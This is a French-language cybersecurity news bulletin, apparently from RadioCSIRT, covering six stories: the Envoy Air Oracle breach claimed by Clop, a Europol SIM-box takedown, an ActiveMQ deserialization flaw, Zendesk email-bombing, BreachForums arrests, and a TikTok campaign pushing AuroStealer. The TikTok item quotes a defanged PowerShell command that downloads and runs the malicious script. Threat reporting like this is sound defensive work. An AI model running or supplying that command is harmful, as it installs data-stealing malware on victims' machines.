Bienvenue dans votre bulletin cybersĂ©curitĂ© du jour âĄïž
đ« American Airlines / Envoy Air â Fuite de donnĂ©es Oracle E-Business Suite
Envoy Air, filiale dâAmerican Airlines, confirme une compromission sur son application Oracle E-Business Suite, aprĂšs la revendication du groupe Clop.Selon la compagnie, aucune donnĂ©e client sensible nâa Ă©tĂ© touchĂ©e, mais un volume limitĂ© dâinformations commerciales a pu ĂȘtre exfiltrĂ©. La campagne dâextorsion est liĂ©e Ă lâexploitation dâune faille zero-day, la CVE-2025-61882, prĂ©cĂ©dant un correctif discret dâOracle sur la CVE-2025-61884.
đź Europol â DĂ©mantĂšlement dâun rĂ©seau international de SIM-box
LâopĂ©ration SIMCARTEL a permis de dĂ©manteler un service illĂ©gal de location de cartes SIM.1 200 dispositifs et 40 000 SIM Ă©taient utilisĂ©s dans plus de 3 200 fraudes, causant 4,5 millions dâeuros de pertes.Deux sites web, gogetsms.com et apisim.com, ont Ă©tĂ© saisis.Sept personnes ont Ă©tĂ© arrĂȘtĂ©es, et plus de 49 millions de comptes frauduleux ont Ă©tĂ© créés Ă travers ce rĂ©seau.
đŠ Apache ActiveMQ â VulnĂ©rabilitĂ© critique CVE-2025-54539
Une faille critique dâexĂ©cution de code Ă distance affecte Apache ActiveMQ NMS AMQP Client jusquâĂ la version 2.3.0.Origine : dĂ©sĂ©rialisation non fiable de donnĂ©es (CWE-502) lors de connexions Ă un broker AMQP malveillant.Score CVSS 9.8, sans privilĂšges ni interaction. CorrigĂ©e en version 2.4.0, supprimant le mĂ©canisme vulnĂ©rable.
đŹ TikTok â Campagne PowerShell diffusant AuroStealer
Des vidĂ©os TikTok diffusent de faux outils dâactivation logicielle, incitant Ă exĂ©cuter la commande PowerShell : iex (irm slmgr[.]win/photoshop) Celle-ci tĂ©lĂ©charge un script malveillant, puis un exĂ©cutable AuroStealer chargĂ© de voler des donnĂ©es. Persistance via tĂąches planifiĂ©es Windows et auto-compilation Ă la volĂ©e via csc.exe, permettant une exĂ©cution en mĂ©moire sans trace sur disque.
đš Zendesk â DĂ©tournement massif des workflows de support
Des acteurs malveillants exploitent lâabsence dâauthentification dans certaines instances Zendesk. RĂ©sultat : des milliers de messages automatiques envoyĂ©s via les domaines clients, saturant les boĂźtes mail cibles. Les tickets anonymes et les dĂ©clencheurs automatiques ont permis cette attaque en masse, que Zendesk qualifie dâabus distribuĂ© « many-against-one ».
âïž Affaire BreachForums â Entre dĂ©fi technique et dĂ©rive judiciaire
Cinq individus ont Ă©tĂ© interpellĂ©s en France entre fĂ©vrier et juin 2025, soupçonnĂ©s dâĂȘtre liĂ©s Ă BreachForums et Ă plusieurs pseudonymes connus : IntelBroker, ShinyHunters, Hollow, Noct, et Depressed. Leurs avocats dĂ©crivent un mĂ©lange dâimmaturitĂ© et de savoir-faire technique, sans motivation financiĂšre. MalgrĂ© ces arrestations, le site a briĂšvement rouvert en juillet avant dâĂȘtre de nouveau fermĂ© par le FBI et la BL2C.
âĄïž On ne rĂ©flĂ©chit pas, on patch !
đ Sources :
https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/
https://www.bleepingcomputer.com/news/security/europol-dismantles-sim-box-operation-renting-numbers-for-cybercrime/
https://thecyberthrone.in/2025/10/17/apache-activemq-affected-by-cve-2025-54539/
https://cyberpress.org/tiktok-powershell-malware/
https://krebsonsecurity.com/2025/10/email-bombs-exploit-lax-authentication-in-zendesk/
https://www.zdnet.fr/actualites/affaire-breachforums-les-mis-en-cause-voulaient-challenger-la-securite-des-grands-groupes-483565.htm
đ Partagez vos retours :
đ± 07 68 72 20 09
đ§ [email protected]
đ https://www.radiocsirt.org
đ° https://radiocsirt.substack.com
#CyberSécurité #CERT #SOC #ThreatIntel #Oracle #Clop #ActiveMQ #CVE202554539 #AuroStealer #TikTok #Zendesk #Europol #SIMBox #BreachForums #RadioCSIRT